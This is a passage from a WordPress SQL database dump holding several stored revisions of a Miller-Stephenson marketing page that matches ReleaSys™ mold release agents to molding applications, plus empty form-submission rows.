<b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-06 13:39:57', '2017-06-06 13:39:57', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4462, 3, '2017-06-06 13:40:17', '2017-06-06 13:40:17', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.\r\n\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinformed Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Custom Formulations</h2>\r\nDidn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request\r\n\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-06 13:40:17', '2017-06-06 13:40:17', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4463, 3, '2017-06-06 18:04:55', '2017-06-06 18:04:55', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-06 18:04:55', '2017-06-06 18:04:55', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4464, 0, '2017-06-06 18:20:16', '2017-06-06 18:20:16', '', '', '', 'publish', 'closed', 'closed', '', '4464', '', '', '2017-06-06 18:20:17', '2017-06-06 18:20:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/4464/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4465, 0, '2017-06-06 19:46:43', '2017-06-06 19:46:43', '', '', '', 'publish', 'closed', 'closed', '', '4465', '', '', '2017-06-06 19:46:43', '2017-06-06 19:46:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4465/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4466, 0, '2017-06-06 21:25:07', '2017-06-06 21:25:07', '', '', '', 'publish', 'closed', 'closed', '', '4466', '', '', '2017-06-06 21:25:07', '2017-06-06 21:25:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/4466/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4467, 1261, '2017-06-07 00:46:16', '2017-06-07 00:46:16', '', '', '', 'publish', 'closed', 'closed', '', '4467', '', '', '2017-06-07 00:46:16', '2017-06-07 00:46:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/4467/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4468, 1264, '2017-06-07 01:53:53', '2017-06-07 01:53:53', '', '', '', 'publish', 'closed', 'closed', '', '4468', '', '', '2017-06-07 01:53:54', '2017-06-07 01:53:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/4468/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4469, 0, '2017-06-07 12:12:14', '2017-06-07 12:12:14', '', '', '', 'publish', 'closed', 'closed', '', '4469', '', '', '2017-06-07 12:12:14', '2017-06-07 12:12:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4469/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4470, 2, '2017-06-07 14:31:08', '2017-06-07 14:31:08', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.\r\n\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinformed Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Custom Formulations</h2>\r\nDidn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request\r\n\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 14:31:08', '2017-06-07 14:31:08', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4471, 0, '2017-06-07 14:53:49', '2017-06-07 14:53:49', '', '', '', 'publish', 'closed', 'closed', '', '4471', '', '', '2017-06-07 14:53:49', '2017-06-07 14:53:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/4471/', 0, 'nf_sub', '', 0); 
